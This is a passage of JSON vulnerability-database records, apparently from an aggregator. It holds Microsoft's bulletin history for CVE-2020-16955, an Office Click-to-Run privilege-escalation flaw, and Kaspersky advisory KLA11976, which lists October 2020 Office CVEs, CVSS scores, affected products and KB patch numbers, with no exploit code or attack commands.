["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-10-01T12:45:24", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-10-01T12:45:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T12:45:24", "differentElements": ["msAffectedSoftware", "vendorCvss"], "edition": 88}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "97e76a94362fa2a4fccdbc4da28a6631", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-10-04T22:45:33", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-10-04T22:45:33", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-10-04T22:45:33", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {"baseScore": "7.8", "temporalScore": "7.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-04T22:45:33", "differentElements": ["msAffectedSoftware"], "edition": 89}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "082ee1eb8db8e4e62e04dfa1dfe23b9b", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-10-06T08:44:57", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-10-04T22:45:33", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-10-04T22:45:33", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {"baseScore": "7.8", "temporalScore": "7.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-06T08:44:57", "differentElements": ["msAffectedSoftware"], "edition": 90}], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-10-06T10:48:58", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-10-06T10:48:58", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {"baseScore": "7.8", "temporalScore": "7.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}, "_object_type": "robots.models.mscve.MsCveBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.mscve.MsCveBulletin"]}], "kaspersky": [{"id": "KLA11976", "hash": "cfbb37172ed7739ec98a0a0dc81176da", "type": "kaspersky", "bulletinFamily": "info", "title": "KLA11976 Multiple vulnerabilites in Microsoft Office", "description": "### *Detect date*:\n10/13/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Office. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, spoof user interface, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft Office 2010 Service Pack 2 (64-bit editions) \nMicrosoft SharePoint Server 2019 \nMicrosoft Office 2016 (32-bit edition) \nMicrosoft Office 2013 RT Service Pack 1 \n3D Viewer \nMicrosoft Office 2016 (64-bit edition) \nMicrosoft Word 2013 Service Pack 1 (32-bit editions) \nMicrosoft SharePoint Foundation 2010 Service Pack 2 \nMicrosoft Word 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office 2013 Click-to-Run (C2R) for 32-bit editions \nMicrosoft Office Web Apps 2010 Service Pack 2 \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nMicrosoft Excel 2010 Service Pack 2 (64-bit editions) \nMicrosoft Outlook 2010 Service Pack 2 (64-bit editions) \nMicrosoft Word 2010 Service Pack 2 (32-bit editions) \nMicrosoft Outlook 2013 RT Service Pack 1 \nMicrosoft Word 2013 RT Service Pack 1 \nMicrosoft Outlook 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office Online Server \nMicrosoft Word 2016 (32-bit edition) \nMicrosoft Excel 2010 Service Pack 2 (32-bit editions) \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft Outlook 2016 (32-bit edition) \nMicrosoft Word 2010 Service Pack 2 (64-bit editions) \nMicrosoft Outlook 2013 Service Pack 1 (32-bit editions) \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \nMicrosoft Excel 2013 RT Service Pack 1 \nMicrosoft Excel 2013 Service Pack 1 (64-bit editions) \nMicrosoft Excel Web App 2010 Service Pack 2 \nMicrosoft Excel 2016 (32-bit edition) \nMicrosoft Word 2016 (64-bit edition) \nMicrosoft SharePoint Server 2010 Service Pack 2 \nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft Excel 2016 (64-bit edition) \nMicrosoft Outlook 2016 (64-bit edition) \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft Office Web Apps 2013 Service Pack 1 \nMicrosoft SharePoint Enterprise Server 2013 Service Pack 1 \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft Office 2019 for Mac \nMicrosoft Office 2016 for Mac \nMicrosoft Outlook 2010 Service Pack 2 (32-bit editions) \nMicrosoft Excel 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2010 Service Pack 2 (32-bit editions) \nMicrosoft Office 2013 Click-to-Run (C2R) for 64-bit editions\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-16928](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16928>) \n[CVE-2020-16929](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16929>) \n[CVE-2020-16941](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16941>) \n[CVE-2020-16946](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16946>) \n[CVE-2020-16947](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16947>) \n[CVE-2020-16944](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16944>) \n[CVE-2020-16945](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16945>) \n[CVE-2020-16948](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16948>) \n[CVE-2020-16949](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16949>) \n[CVE-2020-16942](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16942>) \n[CVE-2020-16932](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16932>) \n[CVE-2020-16952](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16952>) \n[CVE-2020-16955](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16955>) \n[CVE-2020-16954](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16954>) \n[CVE-2020-16951](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16951>) \n[CVE-2020-16950](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16950>) \n[CVE-2020-16953](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16953>) \n[CVE-2020-16934](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16934>) \n[CVE-2020-16933](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16933>) \n[CVE-2020-16918](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16918>) \n[CVE-2020-16957](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16957>) \n[CVE-2020-16930](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16930>) \n[CVE-2020-16931](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16931>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *CVE-IDS*:\n[CVE-2020-16918](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16918>)9.3Critical \n[CVE-2020-16928](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16928>)6.8High \n[CVE-2020-16929](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16929>)6.8High \n[CVE-2020-16941](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16941>)2.1Warning \n[CVE-2020-16946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16946>)3.5Warning \n[CVE-2020-16947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16947>)9.3Critical \n[CVE-2020-16944](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16944>)3.5Warning \n[CVE-2020-16945](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16945>)3.5Warning \n[CVE-2020-16948](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16948>)4.0Warning \n[CVE-2020-16949](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16949>)5.0Critical \n[CVE-2020-16942](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16942>)2.1Warning \n[CVE-2020-16932](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16932>)6.8High \n[CVE-2020-16952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16952>)6.8High \n[CVE-2020-16955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16955>)6.8High \n[CVE-2020-16954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16954>)6.8High \n[CVE-2020-16951](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16951>)6.8High \n[CVE-2020-16950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16950>)4.3Warning \n[CVE-2020-16953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16953>)4.0Warning \n[CVE-2020-16934](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16934>)6.8High \n[CVE-2020-16933](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16933>)6.8High \n[CVE-2020-16957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16957>)9.3Critical \n[CVE-2020-16930](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16930>)6.8High \n[CVE-2020-16931](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16931>)6.8High\n\n### *KB list*:\n[4486682](<http://support.microsoft.com/kb/4486682>) \n[4486678](<http://support.microsoft.com/kb/4486678>) \n[4484417](<http://support.microsoft.com/kb/4484417>) \n[4486676](<http://support.microsoft.com/kb/4486676>) \n[4486694](<http://support.microsoft.com/kb/4486694>) \n[4486707](<http://support.microsoft.com/kb/4486707>) \n[4486701](<http://support.microsoft.com/kb/4486701>) \n[4486687](<http://support.microsoft.com/kb/4486687>) \n[4486708](<http://support.microsoft.com/kb/4486708>) \n[4486677](<http://support.microsoft.com/kb/4486677>) \n[4486674](<http://support.microsoft.com/kb/4486674>) \n[4486688](<http://support.microsoft.com/kb/4486688>) \n[4484524](<http://support.microsoft.com/kb/4484524>) \n[4486663](<http://support.microsoft.com/kb/4486663>) \n[4486689](<http://support.microsoft.com/kb/4486689>) \n[4484531](<http://support.microsoft.com/kb/4484531>) \n[4486700](<http://support.microsoft.com/kb/4486700>) \n[4486679](<http://support.microsoft.com/kb/4486679>) \n[4486695](<http://support.microsoft.com/kb/4486695>) \n[4486703](<http://support.microsoft.com/kb/4486703>) \n[4484435](<http://support.microsoft.com/kb/4484435>) \n[4486692](<http://support.microsoft.com/kb/4486692>) \n[4462175](<http://support.microsoft.com/kb/4462175>) \n[4486671](<http://support.microsoft.com/kb/4486671>)", "published": "2020-10-13T00:00:00", "modified": "2020-10-19T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA11976/", "reporter": "Kaspersky Lab", "references": ["https://threats.kaspersky.com/en/class/Exploit/", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16928", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16929", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16941", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16946", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16947", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16944", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16945", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16948", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16949", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16942", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16932", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16952", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16955", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16954", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16951", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16950", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16953", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16934", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16933", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16918", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16957", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16930", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16931", "https://threats.kaspersky.com/en/product/Microsoft-Office/", "https://threats.kaspersky.com/en/product/Microsoft-Outlook/", "https://threats.kaspersky.com/en/product/Microsoft-Excel/", "https://threats.kaspersky.com/en/product/Microsoft-Word/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16918", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16928", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16929", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16941", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16946", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16947", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16944", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16945", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16948", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16949", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16942", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16932", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16952", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16955", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16954", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16951", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16950", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16953", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16934", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16933", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16957", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16930", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16931", "http://support.microsoft.com/kb/4486682", "http://support.microsoft.com/kb/4486678", "http://support.microsoft.com/kb/4484417", "http://support.microsoft.com/kb/4486676", "http://support.microsoft.com/kb/4486694", "http://support.microsoft.com/kb/4486707", "http://support.microsoft.com/kb/4486701", "http://support.microsoft.com/kb/4486687", "http://support.microsoft.com/kb/4486708", "http://support.microsoft.com/kb/4486677", "http://support.microsoft.com/kb/4486674", "http://support.microsoft.com/kb/4486688", "http://support.microsoft.com/kb/4484524", "http://support.microsoft.com/kb/4486663", "http://support.microsoft.com/kb/4486689", "http://support.microsoft.com/kb/4484531", "http://support.microsoft.com/kb/4486700", "http://support.microsoft.com/kb/4486679", "http://support.microsoft.com/kb/4486695", "http://support.microsoft.com/kb/4486703", "http://support.microsoft.com/kb/4484435", "http://support.microsoft.com/kb/4486692", "http://support.microsoft.com/kb/4462175", "http://support.microsoft.com/kb/4486671", "https://statistics.securelist.com/vulnerability-scan/month"], "cvelist": ["CVE-2020-16918", "CVE-2020-16928", "CVE-2020-16929", "CVE-2020-16930", "CVE-2020-16931", "CVE-2020-16932", "CVE-2020-16933", "CVE-2020-16934", "CVE-2020-16941", "CVE-2020-16942", "CVE-2020-16944", "CVE-2020-16945", "CVE-2020-16946", "CVE-2020-16947", "CVE-2020-16948", "CVE-2020-16949", "CVE-2020-16950", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16953", "CVE-2020-16954", "CVE-2020-16955", "CVE-2020-16957"], "immutableFields": [], "lastseen": "2021-08-18T11:00:15", "history": [{"bulletin": {"id": "KLA11976", "hash": "945204036acb13224bcfdbba5033552b485e4ec65be6b6bfd0046313899fffd4", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA11976Multiple vulnerabilites in Microsoft Office ", "description": "### *Detect date*:\n10/13/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Office. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, spoof user interface, cause denial of service, bypass security restrictions.\n\n### *Affected products*:\nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft Office 2010 Service Pack 2 (64-bit editions) \nMicrosoft SharePoint Server 2019 \nMicrosoft Office 2016 (32-bit edition) \nMicrosoft Office 2013 RT Service Pack 1 \n3D Viewer \nMicrosoft Office 2016 (64-bit edition) \nMicrosoft Word 2013 Service Pack 1 (32-bit editions) \nMicrosoft SharePoint Foundation 2010 Service Pack 2 \nMicrosoft Word 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office 2013 Click-to-Run (C2R) for 32-bit editions \nMicrosoft Office Web Apps 2010 Service Pack 2 \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nMicrosoft Excel 2010 Service Pack 2 (64-bit editions) \nMicrosoft Outlook 2010 Service Pack 2 (64-bit editions) \nMicrosoft Word 2010 Service Pack 2 